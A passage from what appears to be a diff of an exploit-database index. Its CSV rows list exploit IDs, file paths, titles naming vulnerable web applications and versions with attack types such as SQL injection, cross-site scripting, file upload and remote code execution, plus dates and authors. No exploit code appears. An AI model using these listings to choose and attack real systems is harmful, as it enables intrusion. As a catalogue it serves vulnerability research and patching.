Injection",2012-07-23,muts,webapps,php, +20063,exploits/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,webapps,windows, +20064,exploits/linux/webapps/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,webapps,linux, +20083,exploits/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",webapps,php, +20087,exploits/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,webapps,php, +20111,exploits/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,webapps,php, +20123,exploits/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php?groupid' Blind SQL Injection",2012-07-30,Kc57,webapps,php, +20124,exploits/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",webapps,windows, +20158,exploits/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,webapps,php, +20166,exploits/php/webapps/20166.txt,"Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection",2012-08-01,"Patrick de Brouwer",webapps,php, +20170,exploits/php/webapps/20170.txt,"Joomla! Component com_movm - SQL Injection",2012-08-01,D4NB4R,webapps,php, +20171,exploits/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,webapps,php, +20172,exploits/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,webapps,php, +20173,exploits/php/webapps/20173.rb,"WebPageTest - Arbitrary '.PHP' File Upload (Metasploit)",2012-08-02,Metasploit,webapps,php, +20197,exploits/php/webapps/20197.txt,"Joomla! Component com_joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,webapps,php, +20198,exploits/php/webapps/20198.txt,"am4ss 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,webapps,php, +20199,exploits/php/webapps/20199.php,"am4ss Support System 1.2 - PHP Code Injection",2012-08-02,i-Hmx,webapps,php, +20208,exploits/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal",2000-09-07,pestilence,webapps,php, +20260,exploits/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection",2012-08-05,s3n4t00r,webapps,php, +20268,exploits/php/webapps/20268.txt,"Tickets CAD 2.20G - Multiple Vulnerabilities",2012-08-05,chap0,webapps,php, +20270,exploits/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",webapps,php, +20278,exploits/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,webapps,php, +20320,exploits/windows/webapps/20320.txt,"Zoho BugTracker - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-07,LiquidWorm,webapps,windows, +40892,exploits/php/webapps/40892.txt,"Roundcube 1.2.2 - Remote Code Execution",2016-12-09,"Robin Peraglie",webapps,php,80 +20342,exploits/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,webapps,php, +20343,exploits/php/webapps/20343.pl,"Joomla! Component com_enmasse 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,webapps,php, +20344,exploits/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,webapps,php, +20345,exploits/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,webapps,php, +20346,exploits/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,webapps,php, +20347,exploits/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",webapps,php, +20348,exploits/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20349,exploits/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20350,exploits/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20351,exploits/windows/webapps/20351.py,"mailenable enterprise 6.5 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20352,exploits/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20353,exploits/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20356,exploits/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20357,exploits/windows/webapps/20357.py,"Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20358,exploits/php/webapps/20358.py,"WordPress Plugin mini mail Dashboard widget 1.42 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,php, +20359,exploits/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20360,exploits/php/webapps/20360.py,"WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,php, +20361,exploits/php/webapps/20361.py,"WordPress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,php, +20362,exploits/windows/webapps/20362.py,"smartermail free 9.2 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20363,exploits/windows/webapps/20363.py,"Surgemail 6.0a4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20364,exploits/php/webapps/20364.py,"T-dah Webmail Client 3.2.0-2.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,php, +20365,exploits/php/webapps/20365.py,"WordPress Plugin ThreeWP Email Reflector 1.13 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,php, +20366,exploits/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20367,exploits/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows, +20368,exploits/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,webapps,windows, +20390,exploits/php/webapps/20390.txt,"Joomla! Component com_fireboard - SQL Injection",2012-08-09,Vulnerability-Lab,webapps,php, +20391,exploits/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,webapps,php, +20393,exploits/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection",2012-08-09,loneferret,webapps,windows, +20398,exploits/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,webapps,php, +20416,exploits/php/webapps/20416.txt,"WordPress Plugin Mz-jajak 2.1 - SQL Injection",2012-08-10,StRoNiX,webapps,php, +20419,exploits/php/webapps/20419.txt,"Flynax General Classifieds CMS 4.0 - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,webapps,php, +20421,exploits/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,webapps,php, +20422,exploits/php/webapps/20422.txt,"MobileCartly 1.0 - Arbitrary File Write",2012-08-10,"Yakir Wizman",webapps,php, +20428,exploits/php/webapps/20428.txt,"Phorum 3.x - PHP Configuration Disclosure",2000-11-23,"Joao Gouveia",webapps,php, +20431,exploits/php/webapps/20431.txt,"Phorum 3.x - Arbitrary File Read",2000-11-24,"Joao Gouveia",webapps,php, +21316,exploits/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,webapps,php, +20474,exploits/php/webapps/20474.txt,"WordPress Plugin RSVPMaker 2.5.4 - Persistent Cross-Site Scripting",2012-08-13,"Chris Kellum",webapps,php, +20476,exploits/php/webapps/20476.txt,"Hotel Booking Portal 0.1 - Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",webapps,php, +20477,exploits/windows/webapps/20477.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Cross-Site Request Forgery",2012-08-13,"Nir Valtman",webapps,windows, +20478,exploits/windows/webapps/20478.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",webapps,windows, +20538,exploits/php/webapps/20538.txt,"Basilix Webmail 0.9.7 - Incorrect File Permissions",2001-01-11,"Tamer Sahin",webapps,php, +20539,exploits/php/webapps/20539.txt,"MobileCartly 1.0 - Arbitrary File Upload",2012-08-15,ICheer_No0M,webapps,php, +20706,exploits/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,webapps,linux, +20541,exploits/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,webapps,php, +20704,exploits/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,webapps,php, +20544,exploits/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Blind SQL Injection",2012-08-15,stoffline.com,webapps,php, +20545,exploits/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,webapps,windows, +20546,exploits/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,webapps,php, +20549,exploits/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",webapps,php, +20550,exploits/php/webapps/20550.txt,"ProQuiz 2.0.2 - Cross-Site Request Forgery",2012-08-16,DaOne,webapps,php, +20573,exploits/php/webapps/20573.html,"Jaow CMS 2.3 - Cross-Site Request Forgery",2012-08-17,DaOne,webapps,php, +20574,exploits/php/webapps/20574.txt,"Social Engine 4.2.5 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,webapps,php, +20575,exploits/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,webapps,windows, +20576,exploits/php/webapps/20576.txt,"Inferno vBShout 2.5.2 - SQL Injection",2012-08-17,Luit,webapps,php, +20578,exploits/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting",2012-08-17,"Shai rod",webapps,php, +20579,exploits/php/webapps/20579.py,"T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-17,"Shai rod",webapps,php, +20580,exploits/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,webapps,php, +20586,exploits/php/webapps/20586.txt,"Phorum 3.0.7 - 'admin.php3' Unverified Administrative Password Change",2000-01-06,"Max Vision",webapps,php, +20587,exploits/php/webapps/20587.txt,"Phorum 3.0.7 - 'violation.php3' Arbitrary Email Relay",2000-01-01,"Max Vision",webapps,php, +20588,exploits/php/webapps/20588.txt,"Phorum 3.0.7 - 'auth.php3' Backdoor Access",2000-01-06,"Max Vision",webapps,php, +20598,exploits/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQL Injection",2012-08-17,loneferret,webapps,php, +20627,exploits/php/webapps/20627.py,"IlohaMail Webmail - Persistent Cross-Site Scripting",2012-08-18,"Shai rod",webapps,php, +20643,exploits/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Persistent Cross-Site Scripting",2012-08-18,loneferret,webapps,windows,7080 +20665,exploits/php/webapps/20665.txt,"T-dah Webmail - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-08-20,"Yakir Wizman",webapps,php, +20666,exploits/php/webapps/20666.html,"Clipbucket 2.5 - Cross-Site Request Forgery",2012-08-20,DaOne,webapps,php, +20667,exploits/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",webapps,hardware, +20668,exploits/java/webapps/20668.py,"hupa webmail 0.0.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",webapps,java, +20669,exploits/php/webapps/20669.py,"GWebmail 0.7.3 - Cross-Site Scripting / Local File Inclusion / Remote Code Execution",2012-08-20,"Shai rod",webapps,php, +20709,exploits/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Cross-Site Request Forgery (Password Change)",2012-08-22,"Shai rod",webapps,php, +20710,exploits/php/webapps/20710.html,"VamCart 0.9 - Cross-Site Request Forgery",2012-08-22,DaOne,webapps,php, +20712,exploits/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - 'learn-msg.cgi' Command Injection (Metasploit)",2012-08-22,Metasploit,webapps,cgi, +20671,exploits/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,webapps,php, +20672,exploits/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",webapps,php, +20673,exploits/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php?id' SQL Injection",2012-08-20,DaOne,webapps,php, +20713,exploits/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary '.PHP' File Upload (Metasploit)",2012-08-22,Metasploit,webapps,php, +20675,exploits/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",webapps,php, +20677,exploits/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,webapps,windows, +20707,exploits/linux/webapps/20707.py,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,webapps,linux, +20708,exploits/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQL Injection",2012-08-21,loneferret,webapps,php, +20703,exploits/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - Cross-Site Scripting / Arbitrary File Upload",2012-08-21,"Shai rod",webapps,php, +20729,exploits/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",webapps,php, +20761,exploits/php/webapps/20761.txt,"Ad Manager Pro 4 - Local File Inclusion",2012-08-23,CorryL,webapps,php, +20762,exploits/php/webapps/20762.php,"webpa 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,webapps,php, +20759,exploits/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",webapps,php, +20760,exploits/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - VM Applicance Multiple Vulnerabilities",2012-08-23,loneferret,webapps,php, +40423,exploits/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",webapps,php,80 +20785,exploits/php/webapps/20785.txt,"Ad Manager Pro - Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",webapps,php, +20787,exploits/php/webapps/20787.txt,"Text Exchange Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",webapps,php, +20788,exploits/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",webapps,php, +20789,exploits/php/webapps/20789.txt,"Easy Banner Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",webapps,php, +20790,exploits/php/webapps/20790.py,"businesswiki 2.5rc3 - Persistent Cross-Site Scripting / Arbitrary file upload",2012-08-24,"Shai rod",webapps,php, +20848,exploits/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 - URL Block Arbitrary File Disclosure",2001-04-15,"tobozo tagada",webapps,php, +20855,exploits/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",webapps,php, +20856,exploits/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",webapps,php, +20857,exploits/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,webapps,php, +20859,exploits/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' SQL Injection",2012-08-27,JIKO,webapps,php, +20862,exploits/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,webapps,php, +20863,exploits/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - 'products_name_de' Script Insertion",2012-08-27,LiquidWorm,webapps,php, +20864,exploits/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",webapps,asp, +20866,exploits/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",webapps,php, +20871,exploits/php/webapps/20871.txt,"CommPort 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",webapps,php, +20872,exploits/php/webapps/20872.txt,"mieric AddressBook 1.0 - SQL Injection",2012-08-28,"Jean Pascal Pereira",webapps,php, +20873,exploits/php/webapps/20873.html,"RV Article Publisher - Cross-Site Request Forgery",2012-08-28,DaOne,webapps,php, +20874,exploits/php/webapps/20874.html,"RV Shopping Cart - Cross-Site Request Forgery",2012-08-28,DaOne,webapps,php, +20877,exploits/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center - Password Disclosure",2012-08-28,"Mattijs van Ommeren",webapps,hardware, +20913,exploits/php/webapps/20913.txt,"Disqus Blog Comments - Blind SQL Injection",2012-08-29,Spy_w4r3,webapps,php, +20918,exploits/php/webapps/20918.txt,"WordPress Plugin HD Webplayer 1.1 - SQL Injection",2012-08-29,JoinSe7en,webapps,php, +20925,exploits/java/webapps/20925.txt,"SiteWare 2.5/3.0/3.1 Editor Desktop - Directory Traversal",2001-06-13,"Foundstone Labs",webapps,java, +20942,exploits/php/webapps/20942.html,"Booking System Pro - Cross-Site Request Forgery",2012-08-30,DaOne,webapps,php, +20956,exploits/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,webapps,php, +20959,exploits/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting",2012-08-31,"Mike Eduard",webapps,windows, +20981,exploits/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",webapps,php, +20983,exploits/php/webapps/20983.pl,"Joomla! Component Spider Calendar - SQL Injection",2012-09-01,D4NB4R,webapps,php, +20987,exploits/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,webapps,asp, +20995,exploits/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,webapps,php, +20996,exploits/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",webapps,php, +21005,exploits/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",webapps,php, +21007,exploits/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php?id' Blind SQL Injection",2012-09-02,DaOne,webapps,php, +21022,exploits/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",webapps,php, +21032,exploits/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",webapps,hardware, +21033,exploits/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",webapps,hardware, +21038,exploits/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,webapps,php, +21046,exploits/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,webapps,php, +21833,exploits/php/webapps/21833.rb,"PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)",2012-10-10,Metasploit,webapps,php, +21052,exploits/jsp/webapps/21052.txt,"jira 4.4.3 / greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",webapps,jsp, +21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",webapps,multiple, +21054,exploits/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,webapps,php, +21056,exploits/php/webapps/21056.txt,"Group Office Calendar - '/calendar/json.php' SQL Injection",2012-09-04,"Chris Cooper",webapps,php, +21065,exploits/php/webapps/21065.pl,"phpBB 1.x - Page Header Arbitrary Command Execution",2001-07-31,UnderSpell,webapps,php, +21079,exploits/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation (Metasploit)",2012-09-05,Metasploit,webapps,php, +21081,exploits/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections",2012-09-05,"Andrea Fabrizi",webapps,hardware, +21082,exploits/multiple/webapps/21082.txt,"novell sentinel log manager 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",webapps,multiple, +21084,exploits/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,webapps,php, +21085,exploits/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",webapps,asp, +21119,exploits/php/webapps/21119.txt,"PostNuke 0.6 - Unauthenticated User Login",2001-10-13,anonymous,webapps,php, +21132,exploits/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,webapps,php, +21133,exploits/php/webapps/21133.txt,"Clipster Video - Persistent Cross-Site Scripting",2012-09-07,DaOne,webapps,php, +21134,exploits/hardware/webapps/21134.txt,"Sitecom Home Storage Center - Authentication Bypass",2012-09-07,"Mattijs van Ommeren",webapps,hardware, +21135,exploits/php/webapps/21135.txt,"TestLink 1.9.3 - Cross-Site Request Forgery",2012-09-07,"High-Tech Bridge SA",webapps,php, +21148,exploits/php/webapps/21148.txt,"Pinterest Clone Script - Multiple Vulnerabilities",2012-09-08,DaOne,webapps,php, +21157,exploits/php/webapps/21157.txt,"bharat Mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",webapps,php, +21165,exploits/php/webapps/21165.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - 'user.php?uname' Cross-Site Scripting",2001-12-03,"Cabezon Aurélien",webapps,php, +21166,exploits/php/webapps/21166.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2001-12-03,"Cabezon Aurélien",webapps,php, +21168,exploits/php/webapps/21168.txt,"EasyNews 1.5 - NewsDatabase/Template Modification",2001-12-01,"markus arndt",webapps,php, +21184,exploits/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 - Debug Mode Cross-Site Scripting",2001-12-17,"Tamer Sahin",webapps,cgi, +21187,exploits/cgi/webapps/21187.txt,"Aktivate 1.0 3 - Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",webapps,cgi, +21521,exploits/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 - Arbitrary Command Execution",2012-09-25,LiquidWorm,webapps,php, +21206,exploits/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.php 1.0 - Cross-Site Scripting",2002-01-06,frog,webapps,php, +21208,exploits/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi, +21209,exploits/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi, +21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",webapps,php, +21221,exploits/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection",2012-09-10,Yarolinux,webapps,php, +21222,exploits/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,webapps,php, +21230,exploits/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",webapps,php, +21233,exploits/php/webapps/21233.txt,"PHP-Nuke 4.x/5.x - SQL_Debug Information Disclosure",2002-01-18,zataz.com,webapps,php, +21241,exploits/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Inclusion",2002-01-02,"Scott Moonen",webapps,php, +21250,exploits/php/webapps/21250.txt,"Webify Blog - Arbitrary File Deletion",2012-09-11,JIKO,webapps,php, +21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php, +21257,exploits/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - 'search.cgi' Arbitrary Command Execution",2002-01-29,"Aleksey Sintsov",webapps,cgi, +21267,exploits/php/webapps/21267.txt,"Subrion CMS 2.2.1 - Cross-Site Request Forgery (Add Admin)",2012-09-12,LiquidWorm,webapps,php, +21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, +21270,exploits/php/webapps/21270.txt,"Webify Business Directory - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, +21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, +21272,exploits/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,webapps,asp, +21273,exploits/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",webapps,php, +21277,exploits/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,webapps,php, +21278,exploits/php/webapps/21278.txt,"Portix-PHP 0.4 - 'view.php' Directory Traversal",2002-02-04,frog,webapps,php, +21279,exploits/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,webapps,php, +40416,exploits/php/webapps/40416.txt,"Matrimonial Website Script 1.0.2 - SQL Injection",2016-09-22,N4TuraL,webapps,php,80 +21299,exploits/php/webapps/21299.txt,"Powie PForum 1.1x - 'Username' Cross-Site Scripting",2002-02-22,"Jens Liebchen",webapps,php, +21300,exploits/php/webapps/21300.txt,"XMB Forum 1.6 pre-beta - Image Tag Script Injection",2002-02-22,skizzik,webapps,php, +21301,exploits/php/webapps/21301.txt,"OpenBB 1.0.x - Image Tag Cross-Agent Scripting",2002-02-25,skizzik,webapps,php, +21304,exploits/php/webapps/21304.txt,"IkonBoard 2.17/3.0/3.1 - Image Tag Cross-Agent Scripting",2002-02-26,godminus,webapps,php, +21308,exploits/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 - Image Tag Cross-Agent Scripting",2002-02-27,Justin,webapps,asp, +21312,exploits/php/webapps/21312.txt,"ReBB 1.0 - Image Tag Cross-Agent Scripting",2002-03-04,skizzik,webapps,php, +21317,exploits/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,webapps,php, +21319,exploits/aix/webapps/21319.txt,"Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2012-09-14,modpr0be,webapps,aix, +22073,exploits/php/webapps/22073.txt,"APBoard 2.0 2 - Unauthorized Thread Reading",2002-12-06,"DNA ESC",webapps,php, +21324,exploits/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,webapps,php, +21327,exploits/php/webapps/21327.txt,"webERP 4.08.4 - 'WorkOrderEntry.php' SQL Injection",2012-09-17,modpr0be,webapps,php, +21329,exploits/php/webapps/21329.txt,"Auxilium PetRatePro - Multiple Vulnerabilities",2012-09-17,DaOne,webapps,php, +21330,exploits/php/webapps/21330.txt,"Netsweeper WebAdmin Portal - Multiple Vulnerabilities",2012-09-17,"Jacob Holcomb",webapps,php, +21343,exploits/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Inclusion",2002-03-13,b0iler,webapps,php, +21349,exploits/php/webapps/21349.txt,"PHP-Nuke 5.x - Error Message Web Root Disclosure",2002-03-21,godminus,webapps,php, +21352,exploits/cgi/webapps/21352.txt,"DCShop Beta 1.0 - Form Manipulation",2002-03-25,"pokleyzz sakamaniaka",webapps,cgi, +21357,exploits/php/webapps/21357.txt,"PostNuke 0.703 - caselist Arbitrary Module Include",2002-03-28,"pokleyzz 